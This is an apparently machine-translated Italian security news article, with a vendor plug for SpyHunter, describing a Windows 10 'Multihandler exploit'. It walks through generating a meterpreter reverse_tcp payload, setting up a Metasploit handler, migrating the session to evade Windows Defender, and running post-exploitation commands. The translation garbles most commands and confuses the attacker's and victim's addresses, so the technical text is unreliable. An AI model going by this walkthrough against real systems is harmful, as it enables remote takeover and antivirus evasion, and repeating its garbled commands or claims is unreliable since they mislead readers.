Casa > Cyber ​​Notizie > Finestre critiche 10 Vulnerabilità - Multihandler Exploit
CYBER NEWS

Importanti per Windows 10 Vulnerabilità - Multihandler Exploit

Nome Trojan:Win32 / Swrort
Tipo Trojan
breve descrizione Leggere e scrivere le autorizzazioni in Windows 10. Consente l'attaccante di infettare altri PC collegato a quello infetto.
Sintomi Apparendo di un file exe sconosciuto.
Metodo di distribuzione Messaggi di spam. Attacchi MITM, reindirizzamenti dannosi.
Strumento di rilevamento Scarica SpyHunter, Per verificare se il sistema è stata colpita da Trojan:Win32 / Swrort

p15_0000Un pericoloso exploit è stato scoperto in Windows 10, usando un Trojan:Win32 / Swrort di bypassare Windows Defender e di ottenere permessi di lettura e scrittura. Anonimo ricercatore ha dimostrato la vulnerabilità da un canale, detto Metasploitstation. Lui mostra 3 fasi in cui si può scivolare passato di Windows 10 difese. Non c'erano informazioni scoperto finora se questo exploit è stato corretto o no.

Windows 10 Multihandler Exploit Infezione – Come farlo?

Nel video, l'utente tech-savvy ha dimostrato una simulazione di un file '123.exe', che crea ed esegue come se fosse stato aperto nel mondo reale come allegato ad una e-mail o eseguito da un altro metodo. Abbiamo deciso di dividere il processo di infezione in tre fasi per aiutare a capire meglio la metodologia.

Fase 1: file Preparazione

L'hacker crea un carico utile con questa configurazione in ambiente Linux:

msfpaayload finestre / metro preternaturale / reverse_tcp Lhost = LPORT = / Ma New cartella x> / home / / 123.EXE

portnumber1 * – Questa è la porta utilizzata per l'attacco. Può essere qualsiasi porta (4444, 4324, eccetera). Abbiamo scritto portnumber1 dal momento che utilizza un secondo portnumber che abbiamo chiamato poi.

Dopo questa fase è completa e il file viene creato l'attaccante e lasciò cadere sul sistema dell'utente, l'attaccante può procedere alla fase 2.

Fase 2: Utilizzando l'exploit.

A questo punto, l'attaccante Multihandler utilizza per renderlo visualizzare il file exe e sfruttare l'exploit per aprire una sessione attiva(Collegare) al PC vittima.

Questo può accadere utilizzando le righe di comando attuali:

msfconsole (Per avviare la console. Apre 'MSF>' interfaccia)

In 'MSF' l'attaccante può eseguire i seguenti comandi:

MSF> uso exploit / Multi / gestore
set Lhost 'indirizzo IP vittima’
Impostare lport 'portnumber1’

Dopo di che, l'attaccante esegue il carico utile per stabilire una sessione:

msfexploit(gestore)> Imposta payload finestre / metro preternaturale / reverse_tcp

Per verificare se una sessione attiva è possibile, l'attaccante scrive il comando msfexploit(gestore)> Mostra opzioni che gli consentono di vedere questo

→processo exitfunc Si Tecnica Exit(accettato: seh, filo..)
Lhost vittima indirizzo IP sì ascolto porto
LPORT portnumber1 sì ascolto indirizzo

Questo gli permette di vedere che lui configurato correttamente le impostazioni e può procedere con l'infezione effettivo del computer.

Fase 3: Infezione

Il comando che l'attaccante utilizza per avviare una sessione attiva con la vittima è 'sfruttare'. Dopo l'esecuzione di questo comando, il file '123.exe' ritornò con questa risposta:

[*] Iniziato gestore inversa su
[*] Avvio del gestore payload…

A questo punto, l'eseguibile è stato avviato sulla macchina Windows. Nonostante il fatto che il software Windows Defender è in esecuzione, non si è fermata l'attacco. Tuttavia quando sottoposto a scansione antivirus, il programma antivirus di Windows immediatamente rilevato '123.exe' come un cavallo di Troia:Win32 / Swrort.A.

Per evitare il rilevamento, l'attaccante usato una tattica, chiamato migrazione che ha creato un file 'notepad.exe' che migra la sessione attiva da '123.exe' per questo file al momento della connessione. Ciò è stato fatto utilizzando il comando:

meterpreter> Post eseguire / windows / gestire / migrate

Dopo la migrazione del processo e ripetendo la stessa simulazione ma usando (porta diversa), l'attaccante era di nuovo. Questa volta, quando l'attaccante ha ottenuto nel PC che non è stato rilevato anche dopo Windows Defender ha fatto una scansione e il file '123.exe' era ancora presente sul computer.

Da lì, l'attaccante ha dimostrato completo in lettura e scrive le autorizzazioni con la creazione di una nuova cartella con un nuovo documento di testo. Per quanto ne sappiamo i principali comandi che possono essere utilizzati dopo il collegamento sono:

> Sysinfo - per mostrare la versione e le informazioni di sistema.
> dir :/ – di aprire qualsiasi directory di destinazione.
> Shell - per mostrare la versione per Windows e altre informazioni.
> Getwid - mostra di Windows ID.
> Ps -aux - visualizza tutti i file .exe in esecuzione in Task Manager di Windows.
> Ifconfig - visualizza informazioni sulle interfacce (Gli indirizzi IP e altre informazioni). Questo comando dà l'attaccante le informazioni per la connessione a un altro computer che si trova nella stessa scheda di rete e VLAN con il PC infetto. Questo può essere molto devastante per le reti domestiche o in ufficio nel caso in cui tale attacco è ben organizzato.

Windows 10 Gesta – Conclusione

Non ci sono informazioni reali sulla necessità o meno questo exploit è stato fissato, ma come con qualsiasi altro software, ci possono essere quelli più scoperte. Questo è il motivo per cui nel caso in cui si utilizza Windows 10, si consiglia di scaricare e installare avanzato programma di protezione dal malware. Sarà attivamente proteggere voi e aggiornarsi regolarmente con le più recenti minacce. Anche, tale programma ha scudi attivi in ​​grado di rilevare immediatamente eventuali connessioni non autorizzate.

donload_now_250
Spy Hunter scanner rileva solo la minaccia. Se si desidera che la minaccia da rimuovere automaticamente, è necessario acquistare la versione completa del tool anti-malware.Per saperne di più sullo strumento SpyHunter Anti-Malware / Come disinstallare SpyHunter

Berta Bilbao

Berta è un ricercatore di malware dedicato, sognare per un cyber spazio più sicuro. Il suo fascino con la sicurezza IT ha iniziato alcuni anni fa, quando un suo di malware bloccato del proprio computer.

Altri messaggi

Lascio un commento

Il tuo indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito utilizza i cookie per migliorare l'esperienza dell'utente. Utilizzando il nostro sito web acconsenti a tutti i cookie in conformità con la ns politica sulla riservatezza.
Sono d'accordo